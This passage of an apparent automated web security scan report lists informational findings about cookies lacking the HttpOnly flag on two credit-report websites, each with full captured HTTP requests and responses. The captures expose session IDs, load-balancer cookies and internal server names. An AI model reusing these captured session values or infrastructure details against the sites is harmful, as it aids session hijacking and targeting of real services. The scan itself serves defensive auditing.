Set-Cookie: OriginalReferrer=creditchecktotal.com; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=default+s_code.axd+Order1+s_code.axd+ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:39:44 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Last-Modified: Mon, 25 Apr 2011 00:39:44 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:39:44 GMT
ETag: "pv404e091486891421ee6e2e3bd0924e54"
Expires: Wed, 27 Apr 2011 00:39:44 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C64259.A70594.RA70541.G11457.U330279B1].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 863

if(typeof ECD == "undefined") ECD={};
if(typeof ECD.Web == "undefined") ECD.Web={};
if(typeof ECD.Web.WebProcesses == "undefined") ECD.Web.WebProcesses={};
if(typeof ECD.Web.WebProcesses.bpSubmit =
...[SNIP]...

18.446. https://www.creditchecktotal.com/javascripts/s_code.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascripts/s_code.axd HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
Referer: https://www.creditchecktotal.com/Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=752&SiteID=100244&sc=669023&bcd=EYypxrx2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cf0a6e23928a43479df1fd6afa35c72f; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; ASP.NET_SessionId=mgl24145ujchaomvjiwt5n55; MachineName=; NavFlowID=; NumTrialDaysLeft=; BIGipServercreditchecktotal-web-pool=175263242.22559.0000; mbox=check#true#1303691746|session#1303691685768-21127#1303693546|PC#1303691685768-21127.17#1304901288; s_pers=%20s_lv%3D1303691693010%7C1398299693010%3B%20s_lv_s%3DFirst%2520Visit%7C1303693493010%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691693040'%255D%255D%7C1461544493040%3B%20sc_cidstack%3D%255B%255B'669023_EYypxrx2'%252C'1303691693047'%255D%255D%7C1461544493047%3B%20sc_dl%3D1%7C1303693786444%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditchecktotal.com%252Fdefault.aspx%253Fsc%253D669023%2526bcd%253DEYypxrx2%2526mkwid%253DsEYypxrx2%2526pcrid%253D7154421312%2526kwid%253Dcredit%252520monitoring%7C1303693786452%3B%20gpv_PN%3D100244%253Adefault.aspx%7C1303693786456%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20ttc%3D1303691986229%3B%20sc_gvl_sc%3D669023%3B%20sc_gvl_bcd%3Deyypxrx2%3B%20c_m%3Dundefined669023_EYypxrx2undefined%3B%20SC_LINKS%3D100244%253Adefault.aspx%255E%255E%252FCobrand%252FImages%252FCreditMatter%252FGetYoursNow_btn.gif%255E%255E100244%253Adefault.aspx%2520%257C%2520%252FCobrand%252FImages%252FCreditMatter%252FGetYoursNow_btn.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpicctlive%253D%252526pid%25253D100244%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditchecktotal.com%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DX2THZ%25252526SiteVersionID%2525253D752%25252526SiteID%2525253D100244_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; OriginalReferrer=creditchecktotal.com; NavigationPath=default+s_code.axd+Order1; LastVisitDate=4/24/2011 5:39:40 PM

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditchecktotal.com; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=default+s_code.axd+Order1+s_code.axd; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:39:44 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
X-Powered-By: ASP.NET
Content-Type: text/javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:39:44 GMT
ETag: "pv29199a014faff4ac2e548e604da819d8"
Expires: Wed, 27 Apr 2011 00:39:44 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C64259.A70594.RA70541.G11457.UD84854FD].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 65887

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expiglobal,expicctlive"

var s=s_gi(s
...[SNIP]...

18.447. http://www.creditreport.com/dni/javascripts/s_code.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditreport.com
Path:   /dni/javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/javascripts/s_code.axd HTTP/1.1
Host: www.creditreport.com
Proxy-Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditreport.com/dni; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: MachineName=IRC-P2WEB-34; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavigationPath=default+s_code.axd; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 5:34:42 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: UID=18dd3b01affe4b7c805b1b230e3fc542; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
X-Powered-By: ASP.NET
Content-Type: text/javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:34:42 GMT
ETag: "pvc86e2c59b0f7c48f210aad06b63ccdc7"
Expires: Wed, 27 Apr 2011 00:34:42 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C94085.A70594.RA70541.G11457.U58DF84F2].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 65890

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expimnicrlive, expiglobal"

var s=s_g
...[SNIP]...

18.448. https://www.creditreport.com/DNI/ajaxpro/ECD.Web.WebProcesses.bpAddressByZipQAS,ECD.Web.WebProcess.AccountInfo.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /DNI/ajaxpro/ECD.Web.WebProcesses.bpAddressByZipQAS,ECD.Web.WebProcess.AccountInfo.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /DNI/ajaxpro/ECD.Web.WebProcesses.bpAddressByZipQAS,ECD.Web.WebProcess.AccountInfo.ashx HTTP/1.1
Host: www.creditreport.com
Connection: keep-alive
Referer: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NavFlowID=; NumTrialDaysLeft=; OriginalReferrer=creditreport.com/dni; MachineName=IRC-P2WEB-34; NavigationPath=default+s_code.axd+Order1; LastVisitDate=4/24/2011 5:38:38 PM; UID=1fa600332c0648788a77895b94007015; ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+s_code.axd+Order1+ECD.Web.WebProcesses.bpAddressByZipQAS,ECD.Web.WebProcess.AccountInfo.ashx; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 5:38:41 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Last-Modified: Mon, 25 Apr 2011 00:38:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:38:41 GMT
ETag: "pv3dceff9a200494014dd76e454126c9f8"
Expires: Wed, 27 Apr 2011 00:38:41 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C94085.A70594.RA70541.G11457.UB5D65B17].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 955

if(typeof ECD == "undefined") ECD={};
if(typeof ECD.Web == "undefined") ECD.Web={};
if(typeof ECD.Web.WebProcesses == "undefined") ECD.Web.WebProcesses={};
if(typeof ECD.Web.WebProcesses.bpAddressB
...[SNIP]...

18.449. https://www.creditreport.com/DNI/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /DNI/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /DNI/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx HTTP/1.1
Host: www.creditreport.com
Connection: keep-alive
Referer: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NavFlowID=; NumTrialDaysLeft=; OriginalReferrer=creditreport.com/dni; MachineName=IRC-P2WEB-34; NavigationPath=default+s_code.axd+Order1; LastVisitDate=4/24/2011 5:38:38 PM; UID=1fa600332c0648788a77895b94007015; ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+s_code.axd+Order1+ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 5:38:41 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Last-Modified: Mon, 25 Apr 2011 00:38:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:38:41 GMT
ETag: "pve6b631124c6e77b08272636f6750d6c7"
Expires: Wed, 27 Apr 2011 00:38:41 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C94085.A70594.RA70541.G11457.U69C5539F].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 791

if(typeof ECD == "undefined") ECD={};
if(typeof ECD.Web == "undefined") ECD.Web={};
if(typeof ECD.Web.WebProcesses == "undefined") ECD.Web.WebProcesses={};
if(typeof ECD.Web.WebProcesses.bpRegister
...[SNIP]...

18.450. https://www.creditreport.com/DNI/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /DNI/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /DNI/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx HTTP/1.1
Host: www.creditreport.com
Connection: keep-alive
Referer: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NavFlowID=; NumTrialDaysLeft=; OriginalReferrer=creditreport.com/dni; MachineName=IRC-P2WEB-34; NavigationPath=default+s_code.axd+Order1; LastVisitDate=4/24/2011 5:38:38 PM; UID=1fa600332c0648788a77895b94007015; ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+s_code.axd+Order1+ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 5:38:41 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Last-Modified: Mon, 25 Apr 2011 00:38:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:38:41 GMT
ETag: "pvfcfdf636b56d5cf691cbcb1fc0694739"
Expires: Wed, 27 Apr 2011 00:38:41 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C94085.A70594.RA70541.G11457.U783D5C16].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 867

if(typeof ECD == "undefined") ECD={};
if(typeof ECD.Web == "undefined") ECD.Web={};
if(typeof ECD.Web.WebProcesses == "undefined") ECD.Web.WebProcesses={};
if(typeof ECD.Web.WebProcesses.bpSubmit =
...[SNIP]...

18.451. https://www.creditreport.com/dni/Order1.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /dni/Order1.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst HTTP/1.1
Host: www.creditreport.com
Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: MachineName=IRC-P2WEB-34; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: OriginalReferrer=creditreport.com/dni; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavigationPath=Order1; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 6:28:17 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavFlowID=; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NumTrialDaysLeft=; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: UID=77731daa732e49aea233d47cad936667; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:28:17 GMT
ETag: "pvdcf78c1ce3f3db158411db27325dde06"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.UC0B2A2EA].[OT/html.OG/pages]
